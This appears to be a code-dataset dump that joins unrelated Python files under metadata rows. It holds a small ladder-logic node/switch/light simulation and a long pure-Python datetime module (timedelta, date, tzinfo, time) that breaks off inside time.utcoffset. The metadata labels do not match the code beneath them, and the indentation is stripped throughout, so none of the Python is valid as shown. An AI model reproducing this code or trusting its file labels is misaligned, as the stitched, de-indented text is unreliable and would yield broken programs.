|
masom/shopify-trois
|
setup.py
|
Python
|
mit
| 1,267 | 0 |
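# Minimal signal-propagation model: nodes and switches forward set()/clear() calls to their outputs.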
class node:
def __init__(self):
self.outputs=[]
def set(self):
for out in self.outputs:
out.set()
def clear(self):
for out in self.outputs:
out.clear()
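# A switch only passes a set input downstream while it is closed (state is True); open() clears its outputs.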
class switch:
def __init__(self):
self.outputs=[]
self.state=False
self.input=False
def set(self):
self.input=True
if(self.state):
for out in self.outputs:
out.set()
def clear(self):
self.input=False
for out in self.outputs:
out.clear()
def open(self):
self.state=False
for out in self.outputs:
out.clear()
def close(self):
        self.state=True
if(self.input):
for out in self.outputs:
out.set()
class light:
def __init__(self):
self.outputs=[]
def set(self):
print('light set')
for out in self.outputs:
out.set()
def clear(self):
print('light cleared')
for out in self.outputs:
out.clear()
if __name__ == '__main__':
a=node()
s=switch()
b=node()
l=light()
a.outputs.append(s)
s.outputs.append(b)
b.outputs.append(l)
a.set()
s.close()
print('switch close')
s.open()
|
mikadam/LadderiLogical
|
tests/node.py
|
Python
|
mit
| 1,030 | 0.067961 |
"""Concrete date/time and related types.
See http://www.iana.org/time-zones/repository/tz-link.html for
time zone and DST data sources.
"""
import time as _time
import math as _math
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
MINYEAR = 1
MAXYEAR = 9999
_MAXORDINAL = 3652059 # date.max.toordinal()
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
# -1 is a placeholder for indexing purposes.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [-1] # -1 is a placeholder for indexing purposes.
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
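    # wday: Monday == 0; dnum: 1-based day of the year.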
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
def _wrap_strftime(object, format, timetuple):
# Don't call utcoffset() or tzname() unless actually needed.
freplace = None # the string to use for %f
zreplace = None # the string to use for %z
Zreplace = None # the string to use for %Z
# Scan format for %z and %Z escapes, replacing as needed.
newformat = []
push = newformat.append
i, n = 0, len(format)
while i < n:
ch = format[i]
i += 1
if ch == '%':
if i < n:
ch = format[i]
i += 1
if ch == 'f':
if freplace is None:
freplace = '%06d' % getattr(object,
'microsecond', 0)
newformat.append(freplace)
elif ch == 'z':
if zreplace is None:
zreplace = ""
if hasattr(object, "utcoffset"):
offset = object.utcoffset()
if offset is not None:
sign = '+'
if offset.days < 0:
offset = -offset
sign = '-'
h, m = divmod(offset, timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
zreplace = '%c%02d%02d' % (sign, h, m)
assert '%' not in zreplace
newformat.append(zreplace)
elif ch == 'Z':
if Zreplace is None:
Zreplace = ""
if hasattr(object, "tzname"):
s = object.tzname()
if s is not None:
# strftime is going to have at this: escape %
Zreplace = s.replace('%', '%%')
newformat.append(Zreplace)
else:
push('%')
push(ch)
else:
push('%')
else:
push(ch)
newformat = "".join(newformat)
return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
if offset % timedelta(minutes=1) or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes, got %s" % (name, offset))
if not -timedelta(1) < offset < timedelta(1):
raise ValueError("%s()=%s, must be must be strictly between "
"-timedelta(hours=24) and timedelta(hours=24)" %
(name, offset))
def _check_int_field(value):
if isinstance(value, int):
return value
if not isinstance(value, float):
try:
value = value.__int__()
except AttributeError:
pass
else:
if isinstance(value, int):
return value
raise TypeError('__int__ returned non-int (type %s)' %
type(value).__name__)
raise TypeError('an integer is required (got type %s)' %
type(value).__name__)
raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
year = _check_int_field(year)
month = _check_int_field(month)
day = _check_int_field(day)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
hour = _check_int_field(hour)
minute = _check_int_field(minute)
second = _check_int_field(second)
microsecond = _check_int_field(microsecond)
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _divide_and_round(a, b):
"""divide a by b and round result to the nearest integer
When the ratio is exactly half-way between two integers,
the even integer is returned.
"""
# Based on the reference implementation for divmod_near
# in Objects/longobject.c.
q, r = divmod(a, b)
# round up if either r / b > 0.5, or r / b == 0.5 and q is odd.
# The expression r / b > 0.5 is equivalent to 2 * r > b if b is
# positive, 2 * r < b if b negative.
r *= 2
greater_than_half = r > b if b > 0 else r < b
if greater_than_half or r == b and q % 2 == 1:
q += 1
return q
class timedelta:
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int
In addition, datetime supports subtraction of two datetime objects
returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds', '_hashcode'
def __new__(cls, days=0, seconds=0, microseconds=0,
milliseconds=0, minutes=0, hours=0, weeks=0):
# Doing this efficiently and accurately in C is going to be difficult
# and error-prone, due to ubiquitous overflow possibilities, and that
# C double doesn't have enough bits of precision to represent
# microseconds over 10K years faithfully. The code here tries to make
# explicit where go-fast assumptions can be relied on, in order to
# guide the C implementation; it's way more convoluted than speed-
# ignoring auto-overflow-to-long idiomatic Python could be.
# XXX Check that all inputs are ints or floats.
# Final values, all integer.
# s and us fit in 32-bit signed ints; d isn't bounded.
d = s = us = 0
# Normalize everything to days, seconds, microseconds.
days += weeks*7
seconds += minutes*60 + hours*3600
microseconds += milliseconds*1000
# Get rid of all fractions, and normalize s and us.
# Take a deep breath <wink>.
if isinstance(days, float):
dayfrac, days = _math.modf(days)
daysecondsfrac, daysecondswhole = _math.modf(dayfrac * (24.*3600.))
assert daysecondswhole == int(daysecondswhole) # can't overflow
s = int(daysecondswhole)
assert days == int(days)
d = int(days)
else:
daysecondsfrac = 0.0
d = days
assert isinstance(daysecondsfrac, float)
assert abs(daysecondsfrac) <= 1.0
assert isinstance(d, int)
assert abs(s) <= 24 * 3600
# days isn't referenced again before redefinition
if isinstance(seconds, float):
secondsfrac, seconds = _math.modf(seconds)
assert seconds == int(seconds)
seconds = int(seconds)
secondsfrac += daysecondsfrac
assert abs(secondsfrac) <= 2.0
else:
secondsfrac = daysecondsfrac
# daysecondsfrac isn't referenced again
assert isinstance(secondsfrac, float)
assert abs(secondsfrac) <= 2.0
assert isinstance(seconds, int)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 2 * 24 * 3600
# seconds isn't referenced again before redefinition
usdouble = secondsfrac * 1e6
assert abs(usdouble) < 2.1e6 # exact value not critical
# secondsfrac isn't referenced again
if isinstance(microseconds, float):
microseconds = round(microseconds + usdouble)
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
else:
microseconds = int(microseconds)
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
microseconds = round(microseconds + usdouble)
assert isinstance(s, int)
assert isinstance(microseconds, int)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
seconds, us = divmod(microseconds, 1000000)
s += seconds
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def __repr__(self):
if self._microseconds:
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s.%s(%d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days,
self._seconds)
return "%s.%s(%d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds) * 10**6 +
self.microseconds) / 10**6
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
usec = self._to_microseconds()
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(usec * a, b))
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, _divide_and_round(usec, other))
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(b * usec, a))
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if month is None and isinstance(year, bytes) and len(year) == 4 and \
1 <= year[2] <= 12:
# Pickle support
self = object.__new__(cls)
self.__setstate(year)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Construct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __eq__, __le__, __lt__, __ge__, __gt__,
# __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
return date(year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
return NotImplemented
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
return NotImplemented
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
return NotImplemented
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
return NotImplemented
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
return NotImplemented
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
# Computations
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
o = self.toordinal() + other.days
if 0 < o <= _MAXORDINAL:
return date.fromordinal(o)
raise OverflowError("result out of range")
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, timedelta):
return self + timedelta(-other.days)
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta(days1 - days2)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
(used with permission)
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return bytes([yhi, ylo, self._month, self._day]),
def __setstate(self, string):
yhi, ylo, self._month, self._day = string
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo:
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
return dt + dtdst
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time:
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
if isinstance(hour, bytes) and len(hour) == 6 and hour[0] < 24:
# Pickle support
self = object.__new__(cls)
self.__setstate(hour, minute or None)
self._hashcode = -1
return self
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) == 0
else:
return False
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware times")
myhhmm = self._hour * 60 + self._minute - myoff//timedelta(minutes=1)
othhmm = other._hour * 60 + other._minute - otoff//timedelta(minutes=1)
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
if self._hashcode == -1:
tzoff = self.utcoffset()
if not tzoff: # zero or None
self._hashcode = hash(self._getstate()[0])
else:
h, m = divmod(timedelta(hours=self.hour, minutes=self.minute) - tzoff,
timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
if 0 <= h < 24:
self._hashcode = hash(time(h, m, self.second, self.microsecond))
else:
self._hashcode = hash((h, m, self.second, self.microsecond))
return self._hashcode
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
s= "%s.%s(%d, %d%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
def strftime(self, fmt):
"""Format using strftime(). The date part of the timestamp passed
to underlying strftime should not be used.
"""
# The year must be >= 1000 else Python's strftime implementation
# can raise a bogus exception.
timetuple = (1900, 1, 1,
self._hour, self._minute, self._second,
0, 1, -1)
return _wrap_strftime(self, fmt, timetuple)
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
